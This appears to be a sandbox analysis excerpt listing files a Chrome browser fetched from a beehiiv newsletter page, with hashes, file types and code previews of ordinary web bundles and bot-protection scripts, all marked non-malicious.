                                                                                                                                            SSDEEP:1536:3k62zBt4GGyeJn//8H5p80HJEg77f+uHky/oHPN97ayteWIYsn78+PDvwM5aunM1:9GGd0LhMvbhJbwCM8AGXAtg
                                                                                                                                            MD5:6732BB8B08AB3B21295DD2471669E6C5
                                                                                                                                            SHA1:56F71F7588BEAB59AAD7553D7BAB5F41550A3D44
                                                                                                                                            SHA-256:1ABBC4EA1BA8C6AFE125C3B2AB74057A37560DB1F4FE6F8BAED1E4E2A097B5B9
                                                                                                                                            SHA-512:F08DC59B3CBD8BE4E4A0560C094F343B8B872986882C3DF30100B32130A35FE96F94EE7DD03B4F09E42D058A39563760C8675E967E5823F66C5DB23E574A1F16
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/_slug-BPtqEfI0.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="89e9c205-7dfb-5d3c-8453-4b4f79b237e1")}catch(e){}}();.import{j as t}from"./jsx-runtime-BjG_zV1W.js";import{T as R}from"./index-BdpAPpdN.js";import{u as Ie,S as U,F as Ve,r as Ke,L as Ze,a as Ge}from"./useSetLastViewedResource-BelRoKi6.js";import{u as M}from"./useTranslation-CfKJAmGY.js";import{r as p,a as ge,u as we,b as X,g as Pe}from"./index-D6da9p6-.js";import{u as qe,C as Je,D as Ye}from"./index-DTtuIjz-.js";import{c as E}from"./index-x2da_zcv.js";import{B as V}from"./index-EzvqLY92.js";import{I as je}from"./Input-snMSpc3o.js";import{S as Z}from"./StatusInputs-JkVhk_jg.js";import{u as ne}from"./useToast-DK42uF07.js";import{c as $,u as Me,d as Fe}from"./components-Oj2xMfGE.js";import{q as A}from"./transition-y-5XFFuu.js";import{M as Xe}from"./index-IxBbnf-Q.js";import{q as P}f
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (1134)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1492
                                                                                                                                            Entropy (8bit):5.463656351700173
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:UgqHHVvCaRuS+7UNKabQufFTfMiFoJgzhLTCoULEuml/GG/t0lZcyPgyO7+uXk7u:JWkExN9bQuFMShWLfmUQt26quU7nu
                                                                                                                                            MD5:616C4A59027CB60FE037A620AB691867
                                                                                                                                            SHA1:E7A19F00EF3FCAF3B43D43EC632A8B79B12850CA
                                                                                                                                            SHA-256:C2E1C62232302D263E91BB2E68B34973507A3550527B91D9C8A02AC9143628A9
                                                                                                                                            SHA-512:2F9E99B06916FD1B3CEF2689F4C805557F77E046D8DCFAF6F5969754EF234A69BA92B5297878A4DF53F4A91325B317A14815B12BCA724A249D74008E64D488D6
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="c5164328-a43d-5fbd-b391-b0988a59e21e")}catch(e){}}();.import{j as m}from"./jsx-runtime-BjG_zV1W.js";import{c as f}from"./index-x2da_zcv.js";import{r as p}from"./index-D6da9p6-.js";const l={"beehiiv-images-production.s3.amazonaws.com":"media.beehiiv.com","media.beehiiv.net":"media.beehiiv.com","beehiiv-images-staging.s3.amazonaws.com":"media.staginghiiv.com","staging-media.beehiiv.net":"media.staginghiiv.com"},v=(i,s)=>{let e=null;try{e=new URL(i)}catch{}if(!!!(e&&Object.keys(l).includes(e.host)))return i;const t=l[e?.host],a=new URLSearchParams(s).toString().replace(/&/g,",");return`https://${t}/cdn-cgi/image/${a}${e?.pathname}`},x=({src:i,alt:s,maxWidth:e,aspectRatio:o,widthClass:t,...a})=>{const c=p.useRef(null),h={social:"aspect-social",square:"aspect-square",video:"aspect-vid
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (3282)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3658
                                                                                                                                            Entropy (8bit):5.351160382921681
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:JWkE40N1yefwIeLFffomxG3hEoYs/E83/FugOxZ6hNDkzU04ZkTqhPSseXvGDA1:QwWcfQmxET/7Oj6nQzUX7hP6us1
                                                                                                                                            MD5:A8750C2581F92DA1A2942DCC484F8CC8
                                                                                                                                            SHA1:73B741806284B2B9D3C3EEE16E73143C6D62767E
                                                                                                                                            SHA-256:3A6BC484BE7C5CF26CF52D8C0D88D6491D5FDEDD021CA4F0A462FAA2B9CF3EC7
                                                                                                                                            SHA-512:FCF23756F5E9BC529F0E431421DE12C02800735AA54CE506DADFA21986014532EA82370B7253FBC6947DA20725F1012FC836EE05AFE143DD3C7469D959349444
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="2e002f94-b985-51d6-b6a7-9c021b173779")}catch(e){}}();.import{j as e}from"./jsx-runtime-BjG_zV1W.js";import{r as f}from"./index-D6da9p6-.js";import{T as a}from"./index-BdpAPpdN.js";import{u as h}from"./useIsLoggedIn-BbU3-q43.js";import{u as j}from"./useToast-DK42uF07.js";import{B as b}from"./index-EzvqLY92.js";import{I as u}from"./Input-snMSpc3o.js";import{S as _}from"./StatusInputs-JkVhk_jg.js";import{u as x}from"./useTranslation-CfKJAmGY.js";import{R as y}from"./RedirectToHiddenInput-mUb4yii7.js";import{c as w,L as N}from"./components-Oj2xMfGE.js";const p=({emailFieldName:n="email",emailFieldType:i="email",isSubmitting:r=!1})=>{const[l,c]=f.useState(!0),{t:s}=x(),t=e.jsx("button",{type:"button",onClick:()=>c(!l),children:e.jsx(a,{as:"span",size:"xs",type:"body",weight:"bold",the
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (475)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):837
                                                                                                                                            Entropy (8bit):5.474208532581497
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:UgqHHVvCaRuS/8DP6N2f6nXkVn71oi7IyhntUlJ8DPb:JWkEr8GNAsXkVn71fn0J83
                                                                                                                                            MD5:926808DCBF590AD20EDE773BC751D8DE
                                                                                                                                            SHA1:DE4A0A6DE37A4F7C5AA940FC69D9DC87D8EDAF0F
                                                                                                                                            SHA-256:D4569D221FAAF63454B5A7B4CF1168D3B8F19EE4FE905B98229AF2DC013F883B
                                                                                                                                            SHA-512:7947169D23AB9160B9CD25C04E989CCEBA8CE8392BCAC70910DF603FBC6C9FC685FAC3D04BB1C9607460F30E8E32E8E0113E8C70595DDE12E55E1257E9F9D316
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="07c517d1-9bfe-5f21-8839-226ab263a389")}catch(e){}}();.import{r as e}from"./index-D6da9p6-.js";function a({title:r,titleId:t,...o},n){return e.createElement("svg",Object.assign({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24",strokeWidth:1.5,stroke:"currentColor","aria-hidden":"true","data-slot":"icon",ref:n,"aria-labelledby":t},o),r?e.createElement("title",{id:t},r):null,e.createElement("path",{strokeLinecap:"round",strokeLinejoin:"round",d:"M6 18 18 6M6 6l12 12"}))}const i=e.forwardRef(a);export{i as F};.//# sourceMappingURL=XMarkIcon-Y2tO3Ykg.js.map..//# debugId=07c517d1-9bfe-5f21-8839-226ab263a389.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (8771), with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):8771
                                                                                                                                            Entropy (8bit):5.735309182428503
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:zXsw6Okr0dSprRX9eYxxAt2x7cv6xKJfSWqX8ZnIA/cDD4hOf:z8vvJMYxxF+EKXqX8ZIxDD3
                                                                                                                                            MD5:436F1703819130A170A3DB365A480864
                                                                                                                                            SHA1:E87A2951ABF49D4B89EABF1AC9F9898853D4A3CA
                                                                                                                                            SHA-256:8772462FC5634E98AEC963D9953624E0936A5D0344312EBCE2CC5BE561608644
                                                                                                                                            SHA-512:0A3887CD437F9344100D862E02AE4EC067D26DAE01305851C49C70E730122CCAE37643C5E16446A392CAB2D36B42193C64B8144C1D0B8DFF6DE6A63D10891B12
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:window._cf_chl_opt={cFPWv:'b'};~function(W,h,i,n,o,y,z,B){W=b,function(c,d,V,e,f){for(V=b,e=c();!![];)try{if(f=parseInt(V(367))/1+parseInt(V(403))/2*(parseInt(V(417))/3)+parseInt(V(313))/4*(parseInt(V(321))/5)+parseInt(V(348))/6+-parseInt(V(333))/7+-parseInt(V(322))/8*(-parseInt(V(309))/9)+parseInt(V(419))/10*(-parseInt(V(324))/11),d===f)break;else e.push(e.shift())}catch(E){e.push(e.shift())}}(a,230711),h=this||self,i=h[W(431)],n={},n[W(336)]='o',n[W(343)]='s',n[W(378)]='u',n[W(351)]='z',n[W(415)]='n',n[W(349)]='I',n[W(386)]='b',o=n,h[W(389)]=function(E,F,G,H,a8,J,K,L,M,N,O){if(a8=W,null===F||void 0===F)return H;for(J=x(F),E[a8(414)][a8(382)]&&(J=J[a8(364)](E[a8(414)][a8(382)](F))),J=E[a8(426)][a8(393)]&&E[a8(308)]?E[a8(426)][a8(393)](new E[(a8(308))](J)):function(P,a9,Q){for(a9=a8,P[a9(407)](),Q=0;Q<P[a9(373)];P[Q]===P[Q+1]?P[a9(392)](Q+1,1):Q+=1);return P}(J),K='nAsAaAb'.split('A'),K=K[a8(340)][a8(357)](K),L=0;L<J[a8(373)];M=J[L],N=v(E,F,M),K(N)?(O=N==='s'&&!E[a8(316)](F[M]),a8(319)
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (918)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):1233
                                                                                                                                            Entropy (8bit):5.4604704891374
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:hY/LLuvW9BokgrY7cMdhwCBie46Tz1QqIJIzcq9X5wXR5viRX4j:bCo5Y73hwCd4olUItp5wrNj
                                                                                                                                            MD5:5DC258F6742F6D22A4CD80F50926ED70
                                                                                                                                            SHA1:2925F965C31990E0F883E2E885A3D57056168DCC
                                                                                                                                            SHA-256:3B8D3C93FD78C24F4C175C8515E4A5DF79AEE536AF4CED58BA078EA591569EAC
                                                                                                                                            SHA-512:BB63B3078587A823CCBB2314EFF3CCC16B20A01AC717CE37289DA8B5118E5053F867CE62256CC1C9466A7E2CBF60C854F4DEA68A060D67CC51BAAB17179E140C
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://msft.hsprotect.net/index.html
                                                                                                                                            Preview:<!DOCTYPE html>.<html lang='en'>.<head>. <meta charset='UTF-8'>. <meta name='viewport' content='width=device-width, initial-scale=1.0'>. <title>Human Sensor Script Iframe</title>.</head>.<body>.<script>. var a=["_pxvid","_px3","_pxde"];function b(a){var b=new RegExp("(^| )"+a+"=([^;]+)"),c=document.cookie.match(b);return c?c[2]:null}function c(a,b,c){window.parent.postMessage({type:"cookie",name:a,value:b,expires:c||new Date(Date.now()+31536e6).toUTCString()},"*")}function d(a){var b=/^([^=]+)=([^;]*)/,c=/expires=([^;]+)/,d=a.match(b),e=d?d[1]:null,f=d?d[2]:null,g=a.match(c),h=g?g[1]:null;return{cookieName:e,cookieValue:f,expires:h}}function e(b){var e=d(b);-1!==a.indexOf(e.cookieName)&&c(e.cookieName,e.cookieValue,e.expires)}function f(){try{var a=Object.getOwnPropertyDescriptor(Document.prototype,"cookie")||Object.getOwnPropertyDescriptor(Object.getPrototypeOf(document),"cookie"),b=a.get.bind(document),c=a.set.bind(document);Object.defineProperty(document,"cookie",{get:fu
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 15755
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5525
                                                                                                                                            Entropy (8bit):7.961202222662501
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:dySl6/e7OAQD3cS66g8cxO4qXgy66F0+fgENU28TjN3KY6meSsj0ktMvB4YJix2I:dNl6/zFDW6dlXV665ReB67j0sEBWxl
                                                                                                                                            MD5:28CE5BF8BACB96D1C2CFA0092145C6EE
                                                                                                                                            SHA1:303A4629C4467AF2C551EC9E6353464C8C25827D
                                                                                                                                            SHA-256:6B89EEC14865DB53FE20FB3C70B0853362E21669DACE19C06172F673B2EDC5CD
                                                                                                                                            SHA-512:6A10794F105EF5C6F7F7DC2C89152A8342E6D9D8D9490783863ED2737FFD5982E916F72E0A9ECB944AB9815FA70BD20C7256A91E2A62D971F80C23822B809A02
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:...........[}w.F....Bh..i3.M.t.rU.....]..M...@.(..........@..N..I-k..;w.....U.F..v....N....]....MC......U.]o>..mJ.w..~.5<......Z.h~8..8J..m......0.&Z:.Z.D_. .Z.....<.f..t..].I:..........b. ...}.ja......'..x......m6..c...$..........b|s......O.a..cE..u.2.*.6jG!.A.....P..?q@?"..).Mk.0.[."V..M..4...4.~}.?.i..D.}h|..$x.Ajm.S..H..-.x.If..]..1.D0.F......pq.(.|...y\...5....y2.q.Fq...[.|..n.b.i_D......xuR......I.TS.4..}|<...o....MG.+@.......\.?."...+[...A..&...{]......u..+p?......|...j....7...=H..cwp.38.;%c.....O..............p...X.g!....r...d..5.%x.....;...j6p...p......c.Nd.:...&.*....%.. tR.d.@.. ...1..6....i....:...s=..V...iN..1../tH..p<..Mo.......`&.7uA;..(lC.......4...?..0..[S@...D..|....=.wh2...<.. ...)..F...!. .C...k...S.pPt......s..K.V...w......7....Zn.d..t]l.........5=.(..#.....l._.Ip......-O.6.,......q4....!XS`6k..k.....9k....{~*.....X....q......l.>x..={j.n..W......e..Q..I/..;a..MS>.!5v.d.B+.o.....q...j.q..Z..=..@g.1q..,yBV91m.j>..4.o...
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ISO Media, AVIF Image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):2841
                                                                                                                                            Entropy (8bit):7.791757975389654
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:2nX/jwPu09gpt7pARCTfM8d/bRWGE7gkR0cU6sKSDlGSa73KwRlEpePiOhnOhio8:2nrx0qn7US1RWZ7gu0l6dSBGSwDRlZPj
                                                                                                                                            MD5:1ECC0FE16B26E3CEA6378B358D2BA693
                                                                                                                                            SHA1:C1A3A061ED7471373C897B143C044BA2FE0E9B2E
                                                                                                                                            SHA-256:B365CF0C843144C284C3A98D7BDAF9EA8C7AF08485A2E6AC4CB2C9F93FFAD543
                                                                                                                                            SHA-512:51CF1897F976F655EB4CD09F40C78C92361FB52EA14A91EFA8A906DB30535F27131369058D82317DE4F85359CF0F8E0BAED01D669D8CA07C79089E8628797560
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:"https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/static_assets/defaults/thumb_logo.png"
                                                                                                                                            Preview:....ftypavif....mif1miaf....meta.......!hdlr........pict.................pitm..........iloc....D................'...#iinf..........infe........av01....Viprp...8ipco....ispe....... ... ....av1C.?@.....pixi............ipma................./mdat....?.q.|..4.@2..f.`..ID.?............ ....E@.).....ZV..\9.7....F.zQ..%d...9.me.&.Mg...a.^.......8v.4.]......(.1P1...CxV.8.j.D`D.m.....g..^P!|.\V.q|..dN'-..i\..'5.......>.f6.B.R. |......zL.s.hIXJ.R...~^.R..$l..G}.j....Y........x.?-.jh..B.8&.Q.....o....z;..5..h....N..&..l.!..ly.A.3iU...;.8.q.......F.+0..O....#.Z=.:g..&.h.kW..y.......ZV..\9.7....F.zQ..%d...9.me.&.Mg...a.^.v3....i&cm+.ve=....,.."..'.Ia.'S]&.4J....N.[T...X.U-.l..8.5.'.2..x.v.........oX..)..@.u3..h.9.T.r.."0.%.:.Dh@....._.b....?]..7.Z..v....x.LJ....Ej..8.G...c.)..K.].......i.!...W.....D.=.&.....ZV..\9.7....F.zQ..%d...9.me.&.....kV.g.w.*.NR.cB7.h@XF^.7.O...'fz..-8].9._.B5+..P..K...$...:..]Q(.e..l.}A..&....1.O.2n.....t,.......A..8......I...wa.^ao..*@?
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):608
                                                                                                                                            Entropy (8bit):5.579086285119452
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:UgDGH4LOaOvCaBfuSqX82gNwdOZX8270xo2Ju8Vb0X80:UgqHHVvCaRuSYbgNLZX8g0xol39
                                                                                                                                            MD5:37FD78E2EB6A069A31214F74110BD6C2
                                                                                                                                            SHA1:790B3E2AAE539218CAEA7956F31F28FC41E41F6B
                                                                                                                                            SHA-256:AF13D849DF76BC85E6BFECDDAA0419727310AEE108C5D1E4C8F5936D639E2E6A
                                                                                                                                            SHA-512:64DFE47F24775F894D13ADC0251A913C694759BF02AB7D3009854C8774B61563753698BFB738766D5117E0F9EDE1D271DAC289EB5414123B0CD2F96ABA0ECC84
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="ed193780-1927-58d4-9daa-08e3aea056c8")}catch(e){}}();.import{r as c}from"./index-D6da9p6-.js";import{n as o}from"./index-CqJN8iQq.js";const p=(s,e)=>{c.useEffect(()=>{if(s){const{status:f,title:r,message:i}=s,t=`${r?`${r}.`:""}${i}`;f==="error"?o.error(t):(o.success(t),e&&e())}},[s])};export{p as u};.//# sourceMappingURL=useToast-DK42uF07.js.map..//# debugId=ed193780-1927-58d4-9daa-08e3aea056c8.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (543)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):900
                                                                                                                                            Entropy (8bit):5.420679104071606
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:UgqHHVvCaRuSiYaNsLtf/V9wabRmGbCRiGbpNLReOBvw2hcbGbpN52tmR7:JWkEmNqtn3wCwGbCYGbDZhoGbwEB
                                                                                                                                            MD5:CACF9205180D73129CE3BA0102347111
                                                                                                                                            SHA1:FB5F31F7B0CE289777315327AFDEBF5D99E7DED3
                                                                                                                                            SHA-256:D7725E2BFFA0C27EEB262F9912E29FE6EE267C80FB0B8E8CD7050886213120CA
                                                                                                                                            SHA-512:EA4DCE41D267FEE195B257E51948910E345413F05720733A19BDE2414814B1ECBAB3CE95E852997D6E64E68B8B45298679D79B12A02B6B6AC661F0F7DF31D97E
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="e9a76406-c909-5808-b09f-67c6f407b774")}catch(e){}}();.import{r as i}from"./index-D6da9p6-.js";import{b as l}from"./keyboard-CaEu2o0u.js";function s(){let[t]=i.useState(l);return i.useEffect(()=>()=>t.dispose(),[t]),t}function m(t){let e=t.parentElement,n=null;for(;e&&!(e instanceof HTMLFieldSetElement);)e instanceof HTMLLegendElement&&(n=e),e=e.parentElement;let r=e?.getAttribute("disabled")==="";return r&&o(n)?!1:r}function o(t){if(!t)return!1;let e=t.previousElementSibling;for(;e!==null;){if(e instanceof HTMLLegendElement)return!1;e=e.previousElementSibling}return!0}export{s as p,m as r};.//# sourceMappingURL=bugs-DVQzBh-s.js.map..//# debugId=e9a76406-c909-5808-b09f-67c6f407b774.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (354), with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):354
                                                                                                                                            Entropy (8bit):3.9486601962775913
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:CtVezjXpaPHFw8RGTy4ZGh7YRjdMCvNrZ2F83kCySZAETRj1WIfIIQfkb10/:0Ve3QlJRmeQhMmBb3bZ3jIIfItfkb10/
                                                                                                                                            MD5:596652CDDC63CED00C4B1BFD1BB0BFD0
                                                                                                                                            SHA1:FF2510113E7CD2B7600C57D2238BE4E2664D9617
                                                                                                                                            SHA-256:B38327A8459057E107377171945885AAC085557A19918825E457206FCCA32176
                                                                                                                                            SHA-512:D60EACFE467D24195AAC556E371AEE9C5E5B50A05F85A740CFA2CDD0ECFD10F4D4BA9BEE856558755D6E3A1C46A17054768F4DA628B411B1E50969CF687CC51A
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:3be155d7a5bc5a99342eb2a3c3276cfb423476f68abceb2967d4865d5fcab4fc0a5b5a2cf2e459988b266ae1414de694af91e7267e637277c5c34ed9ef21aed9f116099c77f992e1e5744c1923f85d0a7cac39577e88ee139891a1a1114d657bc781c50cec39b62be4746c1a721d24353bcf106efdb7774cf504fc89f4228c62d0d27ac5886ef775fb47d00f9f41b4841be82c830cf5198581d721c439ac4faa6213619f195ff7f493c291e9ae44f17afc
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (26359)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):32343
                                                                                                                                            Entropy (8bit):5.221111329766108
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:5qj6zK1QBf6LtQRTV3xyOwEAodFJ8id3PomyCm8s0jUljCGVVt7e2nNxO+o3DmfV:gjWqCNpB2+Lzot9qwZbpjxp
                                                                                                                                            MD5:00964804AA99C7E8C7383A4CECF18957
                                                                                                                                            SHA1:FBF17940DD346EA0B6C368E3D88EFB1E4331D340
                                                                                                                                            SHA-256:58B32E92619A5B476AE0FFF69CBFDC040BD1BADB221E76B20770048CE48C7DF1
                                                                                                                                            SHA-512:068500552F134B8D233DBC3EA7F1E02132DF47ECCE6725D297E35A6245BB0C898FE38FD39C482ED0235B5658E69132549F6E09A350002B159AD0C34780F67CC0
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="fc6d384a-3a0d-58b1-85cf-befc7c1fa2d5")}catch(e){}}();.import{j as kt}from"./jsx-runtime-BjG_zV1W.js";const Et=Object.prototype.toString;function Mt(t){switch(Et.call(t)){case"[object Error]":case"[object Exception]":case"[object DOMException]":return!0;default:return F(t,Error)}}function k(t,e){return Et.call(t)===`[object ${e}]`}function cn(t){return k(t,"ErrorEvent")}function un(t){return k(t,"DOMError")}function fn(t){return k(t,"DOMException")}function U(t){return k(t,"String")}function Pt(t){return typeof t=="object"&&t!==null&&"__sentry_template_string__"in t&&"__sentry_template_values__"in t}function dn(t){return t===null||Pt(t)||typeof t!="object"&&typeof t!="function"}function K(t){return k(t,"Object")}function wt(t){return typeof Event<"u"&&F(t,Event)}function Lt(t){ret
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):654
                                                                                                                                            Entropy (8bit):5.559620228053553
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:UgDGH4LOaOvCaBfuSkydENwhpavIJRfsLhomJUufsLha79vD8P2yb:UgqHHVvCaRuSky6NCavIJRf+5fR9vDTE
                                                                                                                                            MD5:22FBB78EFBA99FF16F53A9463CA67C65
                                                                                                                                            SHA1:07910364E5B93C7FB3B5500EC756700597DF7F9A
                                                                                                                                            SHA-256:3D5C9E39684D20D9D4F0300250BB84F3B3317E840CBC036B3281318AADE97259
                                                                                                                                            SHA-512:F79DDF623044BD69B7EB526D618C58958D20E3FB2A64CC7DA0216051B967FEB9B712F63CAB4D978DEA3FC64372E5909257122CCECC3A01172FEE8EA3A7EBE9F3
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/StatusInputs-JkVhk_jg.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="43a4c947-e766-5ba1-9194-70247d122a50")}catch(e){}}();.import{j as e}from"./jsx-runtime-BjG_zV1W.js";const a=({name:s,errorMessage:t="",successMessage:r=""})=>e.jsxs(e.Fragment,{children:[e.jsx("input",{hidden:!0,name:`${s}_error_message`,defaultValue:t}),e.jsx("input",{hidden:!0,name:`${s}_success_message`,defaultValue:r})]});export{a as S};.//# sourceMappingURL=StatusInputs-JkVhk_jg.js.map..//# debugId=43a4c947-e766-5ba1-9194-70247d122a50.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (476)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):838
                                                                                                                                            Entropy (8bit):5.453038964859913
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:UgqHHVvCaRuSfN2f6nXkVn71oi7IyhntSt:JWkEzNAsXkVn71fnw
                                                                                                                                            MD5:06EAE6F4D5E43D35C7A844340CC52D0E
                                                                                                                                            SHA1:43850A9C0B6395FBA71F1EEB5085390332E17588
                                                                                                                                            SHA-256:75AE0911A6F12227F21F2A379E39B93541AD864A420BB7B44BB718056E626C79
                                                                                                                                            SHA-512:FD2E83224233162FC1DA133246EDF5844A11374314BE6A9B096116FFBFF2E18264F9B26A6498F59DD7FCF1C7030160037E1466DE549D6DBAA5C6C26E0EA6AE5C
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="aa7f8f9a-f7a3-512d-925f-8380c5df22e3")}catch(e){}}();.import{r as e}from"./index-D6da9p6-.js";function a({title:r,titleId:t,...o},n){return e.createElement("svg",Object.assign({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24",strokeWidth:1.5,stroke:"currentColor","aria-hidden":"true","data-slot":"icon",ref:n,"aria-labelledby":t},o),r?e.createElement("title",{id:t},r):null,e.createElement("path",{strokeLinecap:"round",strokeLinejoin:"round",d:"m4.5 12.75 6 6 9-13.5"}))}const i=e.forwardRef(a);export{i as F};.//# sourceMappingURL=CheckIcon-681VH8qr.js.map..//# debugId=aa7f8f9a-f7a3-512d-925f-8380c5df22e3.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 908206
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):229194
                                                                                                                                            Entropy (8bit):7.998477099778484
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:6144:LuN7ytq4Db6vYr+3KXdJiGYryDq6jVwfwa+afI:LQ7ytq4Db6UOD6Rawa+AI
                                                                                                                                            MD5:E00D81F011CD1C10B3A31D9B813180A7
                                                                                                                                            SHA1:3E77B8C16066EAF5D5ECE664420EC617958D09A8
                                                                                                                                            SHA-256:8638DF62E84B5BDEA091FB9A3FF5045A02D9B1B06902FAA9BC96C74F7BEA0A82
                                                                                                                                            SHA-512:189358D23613D8A2043132FD9169C73965F6EEA20B0F22BC6F81A7B5440ECBCDA6BD7C62E879548A553BBCF26BE159D9E0275A49EAAE9EF39F40D1E7CFC277AE
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://logincdn.msauth.net/shared/5/js/signup-fabric_en_RLki-zAPnyCeesn3sU68Xw2.js
